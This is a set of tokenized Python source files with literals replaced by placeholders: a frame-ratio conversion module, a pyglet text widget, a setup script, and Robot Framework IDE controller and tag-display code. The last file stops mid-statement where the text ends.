<s> import math <EOL> import Rat <EOL> import itertools <EOL> def old_convert_integers_by_ratio ( ratio , num_inputs , src_offset = <NUM_LIT:0> , dest_offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> max_taken = - <NUM_LIT:1> <EOL> for in_frame in xrange ( <NUM_LIT:0> , num_inputs ) : <EOL> out_frame = int ( math . floor ( ( in_frame + <NUM_LIT:1> ) * ratio ) ) - <NUM_LIT:1> <EOL> if out_frame > max_taken : <EOL> for copy in xrange ( max_taken + <NUM_LIT:1> , out_frame + <NUM_LIT:1> ) : <EOL> yield ( in_frame + src_offset , copy + dest_offset ) <EOL> max_taken = out_frame <EOL> def convert_integers_by_ratio ( ratio , num_inputs , src_offset = <NUM_LIT:0> , dest_offset = <NUM_LIT:0> ) : <EOL> return convert_integers_by_iterator_ratio ( ratio , <EOL> xrange ( src_offset , src_offset + num_inputs ) , <EOL> dest_offset = dest_offset ) <EOL> def argh ( ratio , source , dest_offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if len ( source ) == <NUM_LIT:0> : <EOL> raise StopIteration ( ) <EOL> first_frame = source [ <NUM_LIT:0> ] <EOL> for in_frame in source : <EOL> rel_in_frame = in_frame - first_frame <EOL> first_rel_out_frame = int ( math . floor ( rel_in_frame * ratio ) ) <EOL> bound_rel_out_frame = int ( math . floor ( ( rel_in_frame + <NUM_LIT:1> ) * ratio ) ) <EOL> for rel_out_frame in xrange ( first_rel_out_frame , bound_rel_out_frame ) : <EOL> yield ( in_frame , rel_out_frame + dest_offset ) <EOL> def convert_integers_by_iterator_ratio ( ratio , source , dest_offset = <NUM_LIT:0> ) : <EOL> return argh ( ratio , source , dest_offset ) <EOL> def take_last_assignment ( source ) : <EOL> first = True <EOL> last = None <EOL> for assn in source : <EOL> if first : <EOL> last = assn <EOL> first = False <EOL> if assn [ <NUM_LIT:1> ] != last [ <NUM_LIT:1> ] : <EOL> yield last <EOL> last = assn <EOL> if last is not None : <EOL> yield last <EOL> def expected_number ( ratio , num_inputs ) : <EOL> return math . 
floor ( ratio * num_inputs ) <EOL> def ratio_for_number ( num_inputs , num_outputs ) : <EOL> return Rat . rat ( num_outputs , num_inputs ) <EOL> def frames_in_range ( bounds ) : <EOL> return bounds [ <NUM_LIT:1> ] + <NUM_LIT:1> - bounds [ <NUM_LIT:0> ] <EOL> def convert_range_to_range ( in_bounds , out_bounds ) : <EOL> num_outs = frames_in_range ( out_bounds ) <EOL> num_ins = frames_in_range ( in_bounds ) <EOL> ratio = ratio_for_number ( num_ins , num_outs ) <EOL> return convert_integers_by_ratio ( ratio , num_ins , <EOL> src_offset = in_bounds [ <NUM_LIT:0> ] , <EOL> dest_offset = out_bounds [ <NUM_LIT:0> ] ) </s>
<s> import pyglet <EOL> import pyglet . window . key as pkey <EOL> from victor . settings import TEXT_STYLE <EOL> class CommandArea ( object ) : <EOL> def __init__ ( self , x , y , width , batch ) : <EOL> self . document = pyglet . text . document . UnformattedDocument ( "<STR_LIT>" ) <EOL> self . document . set_style ( <NUM_LIT:0> , <NUM_LIT:0> , TEXT_STYLE ) <EOL> font = self . document . get_font ( ) <EOL> height = font . ascent - font . descent <EOL> self . layout = pyglet . text . layout . IncrementalTextLayout ( <EOL> self . document , width , height , multiline = False , batch = batch ) <EOL> self . caret = pyglet . text . caret . Caret ( self . layout ) <EOL> self . has_focus = False <EOL> self . layout . x = x <EOL> self . layout . y = y <EOL> self . layout . anchor_x = "<STR_LIT:left>" <EOL> self . layout . anchor_y = "<STR_LIT>" <EOL> @ property <EOL> def text ( self ) : <EOL> return self . document . text <EOL> def focus ( self ) : <EOL> self . caret . visible = True <EOL> self . document . text = "<STR_LIT::>" <EOL> self . caret . position = len ( self . document . text ) <EOL> self . has_focus = True <EOL> def unfocus ( self ) : <EOL> self . caret . visible = False <EOL> self . caret . position = <NUM_LIT:0> <EOL> self . document . text = "<STR_LIT>" <EOL> self . has_focus = False <EOL> def on_text ( self , text ) : <EOL> self . caret . on_text ( text ) <EOL> def on_text_motion ( self , motion ) : <EOL> self . caret . on_text_motion ( motion ) <EOL> if motion == pkey . MOTION_BACKSPACE and self . caret . position == <NUM_LIT:0> : <EOL> self . has_focus = False </s>
<s> from distutils . core import setup <EOL> from os . path import abspath , dirname , join <EOL> import re <EOL> NAME = '<STR_LIT>' <EOL> CLASSIFIERS = '''<STR_LIT>''' . strip ( ) . splitlines ( ) <EOL> CURDIR = dirname ( abspath ( __file__ ) ) <EOL> with open ( join ( CURDIR , '<STR_LIT:src>' , NAME + '<STR_LIT>' ) ) as source : <EOL> VERSION = re . search ( "<STR_LIT>" , source . read ( ) ) . group ( <NUM_LIT:1> ) <EOL> with open ( join ( CURDIR , '<STR_LIT>' ) ) as readme : <EOL> README = readme . read ( ) <EOL> setup ( <EOL> name = NAME , <EOL> version = VERSION , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> download_url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = README , <EOL> keywords = '<STR_LIT>' , <EOL> platforms = '<STR_LIT>' , <EOL> classifiers = CLASSIFIERS , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT:src>' } , <EOL> py_modules = [ NAME ] , <EOL> ) </s>
<s> class EditorProvider ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _editors = { } <EOL> def register_editor ( self , key , editor , default = True ) : <EOL> if key not in self . _editors : <EOL> self . _editors [ key ] = _EditorList ( ) <EOL> self . _editors [ key ] . add ( editor , default ) <EOL> def unregister_editor ( self , key , editor ) : <EOL> self . _editors [ key ] . remove ( editor ) <EOL> def set_active_editor ( self , key , editor ) : <EOL> self . _editors [ key ] . set_default ( editor ) <EOL> def get_editor ( self , key ) : <EOL> return self . _editors [ key ] . get ( ) <EOL> def get_editors ( self , key ) : <EOL> return self . _editors [ key ] . get_all ( ) <EOL> class _EditorList ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _editors = [ ] <EOL> def add ( self , editor , default = True ) : <EOL> if editor in self . _editors : <EOL> return <EOL> if default : <EOL> self . _editors . append ( editor ) <EOL> else : <EOL> self . _editors . insert ( <NUM_LIT:0> , editor ) <EOL> def set_default ( self , editor ) : <EOL> if not self . _editors . index ( editor ) == - <NUM_LIT:1> : <EOL> self . _editors . remove ( editor ) <EOL> self . _editors . append ( editor ) <EOL> def remove ( self , editor ) : <EOL> self . _editors . remove ( editor ) <EOL> def get ( self ) : <EOL> return self . _editors [ - <NUM_LIT:1> ] <EOL> def get_all ( self ) : <EOL> return self . _editors </s>
<s> from robotide . publish import RideTestCaseRemoved , RideVariableAdded , RideVariableRemoved , RideVariableMovedUp , RideVariableMovedDown , RideUserKeywordRemoved , RideUserKeywordAdded , RideTestCaseAdded <EOL> from robotide . publish . messages import RideItemMovedUp , RideItemMovedDown <EOL> from robotide . robotapi import is_list_var , is_scalar_var , is_dict_var <EOL> from robotide import utils <EOL> from . basecontroller import ControllerWithParent <EOL> from . macrocontrollers import TestCaseController , UserKeywordController <EOL> from robotide . utils import overrides , variablematcher <EOL> from . settingcontrollers import MetadataController , ImportController , VariableController <EOL> class _WithListOperations ( object ) : <EOL> def move_up ( self , index ) : <EOL> if index > <NUM_LIT:0> : <EOL> self . _swap ( index - <NUM_LIT:1> , index ) <EOL> def move_down ( self , index ) : <EOL> if index < len ( self . _items ) - <NUM_LIT:1> : <EOL> self . _swap ( index , index + <NUM_LIT:1> ) <EOL> def _swap ( self , ind1 , ind2 ) : <EOL> self . _items [ ind1 ] , self . _items [ ind2 ] = self . _items [ ind2 ] , self . _items [ ind1 ] <EOL> self . mark_dirty ( ) <EOL> def delete ( self , index ) : <EOL> if isinstance ( self . _items , list ) : <EOL> self . _items . pop ( index ) <EOL> else : <EOL> self . _items . data . pop ( index ) <EOL> self . mark_dirty ( ) <EOL> @ property <EOL> def _items ( self ) : <EOL> raise NotImplementedError ( self . __class__ ) <EOL> def mark_dirty ( self ) : <EOL> raise NotImplementedError ( self . __class__ ) <EOL> class _TableController ( ControllerWithParent ) : <EOL> def __init__ ( self , parent_controller , table ) : <EOL> self . _parent = parent_controller <EOL> self . _table = table <EOL> class VariableTableController ( _TableController , _WithListOperations ) : <EOL> def __init__ ( self , parent_controller , table ) : <EOL> _TableController . __init__ ( self , parent_controller , table ) <EOL> self . 
_variable_cache = { } <EOL> def _get ( self , variable ) : <EOL> if variable not in self . _variable_cache : <EOL> self . _variable_cache [ variable ] = VariableController ( self , variable ) <EOL> return self . _variable_cache [ variable ] <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _get ( v ) for v in self . _table ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . _get ( self . _items [ index ] ) <EOL> def index ( self , ctrl ) : <EOL> return [ v for v in self ] . index ( ctrl ) <EOL> @ property <EOL> def _items ( self ) : <EOL> return self . _table . variables <EOL> def move_up ( self , index ) : <EOL> ctrl = self [ index ] <EOL> _WithListOperations . move_up ( self , index ) <EOL> other = self [ index ] <EOL> self . mark_dirty ( ) <EOL> RideVariableMovedUp ( item = ctrl , other = other ) . publish ( ) <EOL> def move_down ( self , index ) : <EOL> ctrl = self [ index ] <EOL> _WithListOperations . move_down ( self , index ) <EOL> other = self [ index ] <EOL> self . mark_dirty ( ) <EOL> RideVariableMovedDown ( item = ctrl , other = other ) . publish ( ) <EOL> def add_variable ( self , name , value , comment = None ) : <EOL> self . _table . add ( name , value , comment ) <EOL> self . mark_dirty ( ) <EOL> var_controller = self [ - <NUM_LIT:1> ] <EOL> self . notify_variable_added ( var_controller ) <EOL> return var_controller <EOL> def validate_scalar_variable_name ( self , name , item = None ) : <EOL> return self . _validate_name ( _ScalarVarValidator ( ) , name , item ) <EOL> def validate_list_variable_name ( self , name , item = None ) : <EOL> return self . _validate_name ( _ListVarValidator ( ) , name , item ) <EOL> def validate_dict_variable_name ( self , name , item = None ) : <EOL> return self . _validate_name ( _DictVarValidator ( ) , name , item ) <EOL> def _validate_name ( self , validator , name , item = None ) : <EOL> return VariableNameValidation ( self , validator , name , item ) <EOL> def delete ( self , index ) : <EOL> self . 
remove_var ( self [ index ] ) <EOL> def remove_var ( self , var_controller ) : <EOL> self . _items . remove ( var_controller . data ) <EOL> del self . _variable_cache [ var_controller . data ] <EOL> self . mark_dirty ( ) <EOL> self . notify_variable_removed ( var_controller ) <EOL> def notify_variable_added ( self , ctrl ) : <EOL> self . datafile_controller . update_namespace ( ) <EOL> RideVariableAdded ( datafile = self . datafile , <EOL> name = ctrl . name , item = ctrl , <EOL> index = ctrl . index ) . publish ( ) <EOL> def notify_variable_removed ( self , ctrl ) : <EOL> self . datafile_controller . update_namespace ( ) <EOL> RideVariableRemoved ( datafile = self . datafile , <EOL> name = ctrl . name , item = ctrl ) . publish ( ) <EOL> def contains_variable ( self , name ) : <EOL> vars_as_list = [ ] <EOL> for var in self . _items : <EOL> vars_as_list += var . as_list ( ) <EOL> return any ( variablematcher . value_contains_variable ( string , name ) <EOL> for string in vars_as_list ) <EOL> class _ScalarVarValidator ( object ) : <EOL> __call__ = lambda self , name : is_scalar_var ( name ) <EOL> name = '<STR_LIT>' <EOL> prefix = '<STR_LIT:$>' <EOL> class _ListVarValidator ( object ) : <EOL> __call__ = lambda self , name : is_list_var ( name ) <EOL> name = '<STR_LIT>' <EOL> prefix = '<STR_LIT:@>' <EOL> class _DictVarValidator ( object ) : <EOL> __call__ = lambda self , name : is_dict_var ( name ) <EOL> name = '<STR_LIT>' <EOL> prefix = '<STR_LIT:&>' <EOL> class _NameValidation ( object ) : <EOL> def __init__ ( self , table , name , named_ctrl = None ) : <EOL> self . _table = table <EOL> self . error_message = '<STR_LIT>' <EOL> self . _named_ctrl = named_ctrl <EOL> self . _validate ( name . strip ( ) ) <EOL> def _name_taken ( self , name ) : <EOL> return any ( utils . eq ( name , item . name , ignore = [ '<STR_LIT:_>' ] ) <EOL> for item in self . _table if item != self . 
_named_ctrl ) <EOL> class VariableNameValidation ( _NameValidation ) : <EOL> def __init__ ( self , table , validator , name , named_ctrl = None ) : <EOL> self . _validator = validator <EOL> _NameValidation . __init__ ( self , table , name , named_ctrl ) <EOL> def _validate ( self , name ) : <EOL> if not self . _validator ( name ) : <EOL> self . error_message = '<STR_LIT>' % ( self . _validator . name , self . _validator . prefix ) <EOL> if self . _name_taken ( name ) : <EOL> self . error_message = '<STR_LIT>' <EOL> class MacroNameValidation ( _NameValidation ) : <EOL> def _validate ( self , name ) : <EOL> if not name : <EOL> self . error_message = '<STR_LIT>' % self . _table . item_type <EOL> if self . _name_taken ( name ) : <EOL> self . error_message = '<STR_LIT>' % self . _table . item_type <EOL> if "<STR_LIT:\n>" in name : <EOL> self . error_message = '<STR_LIT>' % self . _table . item_type <EOL> class _MacroTable ( _TableController ) : <EOL> @ property <EOL> def _items ( self ) : <EOL> raise NotImplementedError ( self . __class__ ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _create_controller ( item ) for item in self . _table ) <EOL> def _create_controller ( self , item ) : <EOL> if item not in self . _item_to_controller : <EOL> self . _item_to_controller [ item ] = self . _controller_class ( self , item ) <EOL> return self . _item_to_controller [ item ] <EOL> @ property <EOL> def _item_to_controller ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _item_to_controller_attribute = { } <EOL> return self . _item_to_controller_attribute <EOL> def __len__ ( self ) : <EOL> return len ( self . _items ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . _create_controller ( self . _items [ index ] ) <EOL> def move_up ( self , item ) : <EOL> items = self . _items <EOL> idx = items . 
index ( item ) <EOL> if idx == <NUM_LIT:0> : <EOL> return False <EOL> upper = idx - <NUM_LIT:1> <EOL> items [ upper ] , items [ idx ] = items [ idx ] , items [ upper ] <EOL> self . mark_dirty ( ) <EOL> RideItemMovedUp ( item = self . _create_controller ( item ) ) . publish ( ) <EOL> return True <EOL> def move_down ( self , item ) : <EOL> items = self . _items <EOL> idx = items . index ( item ) <EOL> if idx + <NUM_LIT:1> == len ( items ) : <EOL> return False <EOL> lower = idx + <NUM_LIT:1> <EOL> items [ idx ] , items [ lower ] = items [ lower ] , items [ idx ] <EOL> self . mark_dirty ( ) <EOL> RideItemMovedDown ( item = self . _create_controller ( item ) ) . publish ( ) <EOL> return True <EOL> def validate_name ( self , name , named_ctrl = None ) : <EOL> return MacroNameValidation ( self , name , named_ctrl ) <EOL> def delete ( self , ctrl ) : <EOL> self . _items . remove ( ctrl . data ) <EOL> if ctrl . data in self . _item_to_controller : <EOL> del self . _item_to_controller [ ctrl . data ] <EOL> self . datafile_controller . update_namespace ( ) <EOL> self . mark_dirty ( ) <EOL> self . _notify_removal ( ctrl ) <EOL> def add ( self , ctrl ) : <EOL> item = ctrl . data <EOL> item . parent = self . _table <EOL> self . _items . append ( item ) <EOL> new_controller = self . _create_controller ( item ) <EOL> self . datafile_controller . update_namespace ( ) <EOL> self . mark_dirty ( ) <EOL> self . _notify_creation ( new_controller . name , new_controller ) <EOL> def _create_new ( self , name , config = None ) : <EOL> name = name . strip ( ) <EOL> ctrl = self . _create_controller ( self . _table . add ( name ) ) <EOL> self . _configure_controller ( ctrl , config ) <EOL> self . datafile_controller . update_namespace ( ) <EOL> self . mark_dirty ( ) <EOL> self . 
_notify_creation ( name , ctrl ) <EOL> return ctrl <EOL> def _configure_controller ( self , ctrl , config ) : <EOL> pass <EOL> class TestCaseTableController ( _MacroTable ) : <EOL> item_type = '<STR_LIT>' <EOL> _controller_class = TestCaseController <EOL> @ property <EOL> def _items ( self ) : <EOL> return self . _table . tests <EOL> def _notify_creation ( self , name , ctrl ) : <EOL> RideTestCaseAdded ( datafile = self . datafile , name = name , item = ctrl ) . publish ( ) <EOL> def _notify_removal ( self , item ) : <EOL> RideTestCaseRemoved ( datafile = self . datafile , name = item . name , item = item ) . publish ( ) <EOL> def new ( self , name ) : <EOL> return self . _create_new ( name ) <EOL> class KeywordTableController ( _MacroTable ) : <EOL> item_type = '<STR_LIT>' <EOL> _controller_class = UserKeywordController <EOL> @ property <EOL> def _items ( self ) : <EOL> return self . _table . keywords <EOL> def _notify_creation ( self , name , ctrl ) : <EOL> RideUserKeywordAdded ( datafile = self . datafile , name = name , item = ctrl ) . publish ( ) <EOL> def _notify_removal ( self , item ) : <EOL> RideUserKeywordRemoved ( datafile = self . datafile , name = item . name , item = item ) . publish ( ) <EOL> def new ( self , name , argstr = '<STR_LIT>' ) : <EOL> return self . _create_new ( name , argstr ) <EOL> def _configure_controller ( self , ctrl , config ) : <EOL> if config : <EOL> ctrl . arguments . set_value ( config ) <EOL> def sort ( self ) : <EOL> """<STR_LIT>""" <EOL> keywords_sorted = sorted ( self . _table . keywords , key = lambda userkeyword : userkeyword . name ) <EOL> index_difference = self . _index_difference ( self . _table . keywords , keywords_sorted ) <EOL> self . _table . 
keywords = keywords_sorted <EOL> return index_difference <EOL> def _index_difference ( self , original_list , sorted_list ) : <EOL> """<STR_LIT>""" <EOL> index_difference = [ ] <EOL> for kw in original_list : <EOL> counter = <NUM_LIT:0> <EOL> for kw2 in sorted_list : <EOL> if kw . name == kw2 . name : <EOL> index_difference . append ( counter ) <EOL> break <EOL> counter += <NUM_LIT:1> <EOL> return index_difference <EOL> def restore_keyword_order ( self , list ) : <EOL> """<STR_LIT>""" <EOL> keywords_temp = [ ] <EOL> for i in list : <EOL> keywords_temp . append ( self . _table . keywords [ i ] ) <EOL> self . _table . keywords = keywords_temp <EOL> class ImportSettingsController ( _TableController , _WithListOperations ) : <EOL> def __init__ ( self , parent_controller , table , resource_file_controller_factory = None ) : <EOL> _TableController . __init__ ( self , parent_controller , table ) <EOL> self . _resource_file_controller_factory = resource_file_controller_factory <EOL> self . __import_controllers = None <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _import_controllers ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . _import_controllers [ index ] <EOL> @ property <EOL> def _import_controllers ( self ) : <EOL> if self . __import_controllers is None : <EOL> self . __import_controllers = [ self . _import_controller ( imp ) for imp in self . _items ] <EOL> return self . __import_controllers <EOL> def _import_controller ( self , import_ ) : <EOL> return ImportController ( self , import_ ) <EOL> @ property <EOL> def _items ( self ) : <EOL> return self . _table . imports <EOL> @ property <EOL> def resource_file_controller_factory ( self ) : <EOL> return self . _resource_file_controller_factory <EOL> @ overrides ( _WithListOperations ) <EOL> def _swap ( self , ind1 , ind2 ) : <EOL> imps = self . _import_controllers <EOL> imps [ ind1 ] , imps [ ind2 ] = imps [ ind2 ] , imps [ ind1 ] <EOL> _WithListOperations . 
_swap ( self , ind1 , ind2 ) <EOL> def remove_import_data ( self , imp ) : <EOL> self . delete ( self . _items . data . index ( imp ) ) <EOL> def delete ( self , index ) : <EOL> item = self [ index ] <EOL> _WithListOperations . delete ( self , index ) <EOL> self . _import_controllers . pop ( index ) <EOL> item . publish_removed ( ) <EOL> self . notify_imports_modified ( ) <EOL> def add_library ( self , name , argstr , alias , comment = None ) : <EOL> self . _import_controllers <EOL> import_ = self . _table . add_library ( name , utils . split_value ( argstr ) , <EOL> comment ) <EOL> import_ . alias = alias <EOL> self . _parent . mark_dirty ( ) <EOL> self . _add_controller ( import_ ) <EOL> self . notify_imports_modified ( ) <EOL> return self [ - <NUM_LIT:1> ] <EOL> def _add_controller ( self , import_ ) : <EOL> ctrl = self . _import_controller ( import_ ) <EOL> ctrl . publish_added ( ) <EOL> self . _import_controllers . append ( ctrl ) <EOL> def add_resource ( self , path , comment = None ) : <EOL> self . _import_controllers <EOL> import_ = self . _table . add_resource ( path , comment ) <EOL> self . _parent . mark_dirty ( ) <EOL> self . resource_import_modified ( path ) <EOL> self . _add_controller ( import_ ) <EOL> self . notify_imports_modified ( ) <EOL> return self [ - <NUM_LIT:1> ] <EOL> def add_variables ( self , path , argstr , comment = None ) : <EOL> self . _import_controllers <EOL> import_ = self . _table . add_variables ( path , utils . split_value ( argstr ) , comment ) <EOL> self . _parent . mark_dirty ( ) <EOL> self . _add_controller ( import_ ) <EOL> return self [ - <NUM_LIT:1> ] <EOL> def notify_imports_modified ( self ) : <EOL> self . datafile_controller . update_namespace ( ) <EOL> def resource_import_modified ( self , path ) : <EOL> return self . _parent . 
resource_import_modified ( path ) <EOL> class MetadataListController ( _TableController , _WithListOperations ) : <EOL> def __iter__ ( self ) : <EOL> return iter ( MetadataController ( self , m ) for m in self . _items ) <EOL> def __getitem__ ( self , index ) : <EOL> return MetadataController ( self , self . _items [ index ] ) <EOL> @ property <EOL> def _items ( self ) : <EOL> return self . _table . metadata <EOL> def add_metadata ( self , name , value , comment = None ) : <EOL> self . _table . add_metadata ( name , value , comment ) <EOL> self . _parent . mark_dirty ( ) <EOL> return self [ - <NUM_LIT:1> ] </s>
<s> if __name__ == '<STR_LIT:__main__>' : <EOL> import robotide as _ <EOL> import wx <EOL> from robotide . editor . flowsizer import HorizontalFlowSizer <EOL> from robotide . controller . commands import ChangeTag <EOL> from robotide . controller . tags import ForcedTag , DefaultTag , Tag <EOL> class TagsDisplay ( wx . Panel ) : <EOL> def __init__ ( self , parent , controller ) : <EOL> wx . Panel . __init__ ( self , parent , wx . ID_ANY ) <EOL> self . _controller = controller <EOL> self . _sizer = HorizontalFlowSizer ( ) <EOL> self . _sizer . SetMinSize ( ( <NUM_LIT:0> , <NUM_LIT:20> ) ) <EOL> self . _tag_boxes = [ ] <EOL> self . SetSizer ( self . _sizer ) <EOL> def add_tag ( self , tag ) : <EOL> self . _add_tagbox ( Properties ( tag , self . _controller ) ) <EOL> def _add_tagbox ( self , properties ) : <EOL> tagbox = TagBox ( self , properties ) <EOL> self . _sizer . Add ( tagbox ) <EOL> self . _tag_boxes . append ( tagbox ) <EOL> def build ( self ) : <EOL> if not ( self . _tag_boxes and self . _tag_boxes [ - <NUM_LIT:1> ] . add_new ) : <EOL> self . add_new_tag_tagbox ( rebuild = False ) <EOL> parent_sizer = self . GetParent ( ) . GetSizer ( ) <EOL> if parent_sizer : <EOL> parent_sizer . Layout ( ) <EOL> def clear ( self ) : <EOL> self . set_value ( self . _controller ) <EOL> def close ( self ) : <EOL> for tag_box in self . _tag_boxes : <EOL> tag_box . close ( ) <EOL> def saving ( self ) : <EOL> for tag_box in self . _tag_boxes : <EOL> tag_box . saving ( ) <EOL> def set_value ( self , controller , plugin = None ) : <EOL> if not self . _tag_boxes : <EOL> self . _add_tags ( list ( controller ) ) <EOL> else : <EOL> self . _modify_values ( controller ) <EOL> self . build ( ) <EOL> def add_new_tag_tagbox ( self , rebuild = True ) : <EOL> self . _add_tagbox ( AddTagBoxProperties ( self . _controller . empty_tag ( ) , self ) ) <EOL> if rebuild : <EOL> self . build ( ) <EOL> def _add_tags ( self , tags ) : <EOL> for tag in tags : <EOL> self . 
add_tag ( tag ) <EOL> def _modify_values ( self , controller ) : <EOL> self . _remove_empty_tagboxes ( ) <EOL> self . _set_tags ( list ( controller ) , self . _tag_boxes [ : ] , controller ) <EOL> def _remove_empty_tagboxes ( self ) : <EOL> for tb in self . _tag_boxes [ : ] : <EOL> if tb . value == '<STR_LIT>' : <EOL> self . _destroy_tagbox ( tb ) <EOL> def _set_tags ( self , tags , tagboxes , controller ) : <EOL> if not tags : <EOL> self . _destroy_tagboxes ( tagboxes ) <EOL> elif not tagboxes : <EOL> self . _add_tags ( tags ) <EOL> else : <EOL> tagboxes [ <NUM_LIT:0> ] . set_properties ( Properties ( tags [ <NUM_LIT:0> ] , controller ) ) <EOL> self . _set_tags ( tags [ <NUM_LIT:1> : ] , tagboxes [ <NUM_LIT:1> : ] , controller ) <EOL> def _destroy_tagboxes ( self , tagboxes ) : <EOL> for tb in tagboxes : <EOL> if not tb . add_new : <EOL> self . _destroy_tagbox ( tb ) <EOL> def _destroy_tagbox ( self , tagbox ) : <EOL> tagbox . Destroy ( ) <EOL> self . _tag_boxes . remove ( tagbox ) <EOL> def GetSelection ( self ) : <EOL> return None <EOL> def get_height ( self ) : <EOL> return self . _sizer . height <EOL> class TagBox ( wx . TextCtrl ) : <EOL> def __init__ ( self , parent , properties ) : <EOL> wx . TextCtrl . __init__ ( self , parent , wx . ID_ANY , '<STR_LIT>' , style = wx . TE_CENTER ) <EOL> self . _bind ( ) <EOL> self . set_properties ( properties ) <EOL> def _bind ( self ) : <EOL> for event , handler in [ ( wx . EVT_SET_FOCUS , self . OnSetFocus ) , <EOL> ( wx . EVT_KILL_FOCUS , self . OnKillFocus ) , <EOL> ( wx . EVT_LEFT_UP , self . OnSetFocus ) , <EOL> ( wx . EVT_KEY_UP , self . OnKeyUp ) , <EOL> ( wx . EVT_CHAR , self . OnChar ) ] : <EOL> self . Bind ( event , handler ) <EOL> def set_properties ( self , properties ) : <EOL> self . _properties = properties <EOL> self . _apply_properties ( ) <EOL> def _apply_properties ( self ) : <EOL> self . SetValue ( self . _properties . text ) <EOL> self . SetToolTipString ( self . _properties . tooltip ) <EOL> self . 
SetEditable ( self . _properties . enabled ) <EOL> size = self . _get_size ( ) <EOL> self . SetMaxSize ( size ) <EOL> self . SetMinSize ( size ) <EOL> self . _colorize ( ) <EOL> def _get_size ( self ) : <EOL> size = self . GetTextExtent ( self . value ) <EOL> return wx . Size ( max ( size [ <NUM_LIT:0> ] + <NUM_LIT:10> , <NUM_LIT> ) , max ( size [ <NUM_LIT:1> ] + <NUM_LIT:3> , <NUM_LIT> ) ) <EOL> def _colorize ( self ) : <EOL> self . SetForegroundColour ( self . _properties . foreground_color ) <EOL> self . SetBackgroundColour ( self . _properties . background_color ) <EOL> def close ( self ) : <EOL> self . _update_value ( ) <EOL> def saving ( self ) : <EOL> self . _update_value ( ) <EOL> def OnKeyUp ( self , event ) : <EOL> if self . _properties . modifiable : <EOL> if event . GetKeyCode ( ) == wx . WXK_ESCAPE : <EOL> self . _cancel_editing ( ) <EOL> elif event . GetKeyCode ( ) == wx . WXK_RETURN : <EOL> self . _update_value ( ) <EOL> return <EOL> elif event . GetKeyCode ( ) == wx . WXK_DELETE : <EOL> self . SetValue ( '<STR_LIT>' ) <EOL> event . Skip ( ) <EOL> def _cancel_editing ( self ) : <EOL> self . SetValue ( self . _properties . text ) <EOL> self . _colorize ( ) <EOL> def OnChar ( self , event ) : <EOL> if event . GetKeyCode ( ) != wx . WXK_ESCAPE : <EOL> self . _properties . activate ( self ) <EOL> event . Skip ( ) <EOL> def OnKillFocus ( self , event ) : <EOL> self . _update_value ( ) <EOL> def _update_value ( self ) : <EOL> self . _properties . change_value ( self . value ) <EOL> def OnSetFocus ( self , event ) : <EOL> if self . _properties . add_new : <EOL> wx . CallAfter ( self . SelectAll ) <EOL> event . Skip ( ) <EOL> @ property <EOL> def value ( self ) : <EOL> return self . GetValue ( ) . strip ( ) <EOL> @ property <EOL> def add_new ( self ) : <EOL> return self . _properties . add_new <EOL> def Properties ( tag , controller ) : <EOL> if tag . controller == controller : <EOL> return TagBoxProperties ( tag ) <EOL> return tag . 
choose ( { ForcedTag : ForcedTagBoxProperties , <EOL> DefaultTag : DefaultTagBoxProperties } ) ( tag ) <EOL> class _TagBoxProperties ( object ) : <EOL> foreground_color = '<STR_LIT>' <EOL> background_color = '<STR_LIT>' <EOL> enabled = True <EOL> add_new = False <EOL> def __init__ ( self , tag ) : <EOL> self . _tag = tag <EOL> @ property <EOL> def text ( self ) : <EOL> return self . _tag . name or '<STR_LIT>' <EOL> @ property <EOL> def tooltip ( self ) : <EOL> return self . _tag . tooltip <EOL> @ property <EOL> def modifiable ( self ) : <EOL> return self . enabled <EOL> def change_value ( self , value ) : <EOL> if self . modifiable and value != self . text : <EOL> self . _tag . controller . execute ( ChangeTag ( self . _tag , value ) ) <EOL> def activate ( self , tagbox ) : <EOL> pass <EOL> class TagBoxProperties ( _TagBoxProperties ) : <EOL> pass <EOL> class AddTagBoxProperties ( _TagBoxProperties ) : <EOL> foreground_color = '<STR_LIT>' <EOL> text = '<STR_LIT>' <EOL> tooltip = '<STR_LIT>' <EOL> modifiable = False <EOL> add_new = True <EOL> def __init__ ( self , tag , display ) : <EOL> _TagBoxProperties . __init__ ( self , tag ) <EOL> self . _display = display <EOL> def activate ( self , tagbox ) : <EOL> tagbox . set_properties ( TagBoxProperties ( self . _tag ) ) <EOL> self . _display . add_new_tag_tagbox ( ) <EOL> class ForcedTagBoxProperties ( _TagBoxProperties ) : <EOL> foreground_color = '<STR_LIT>' <EOL> background_color = '<STR_LIT>' <EOL> enabled = False <EOL> class DefaultTagBoxProperties ( _TagBoxProperties ) : <EOL> foreground_color = '<STR_LIT>' <EOL> background_color = '<STR_LIT>' <EOL> enabled = False <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> class MyFrame ( wx . Frame ) : <EOL> def __init__ ( self , parent , id , title ) : <EOL> wx . Frame . __init__ ( self , parent , id , title ) <EOL> class MyMenuApp ( wx . App ) : <EOL> def OnInit ( self ) : <EOL> frame = MyFrame ( None , - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> sz = wx . 
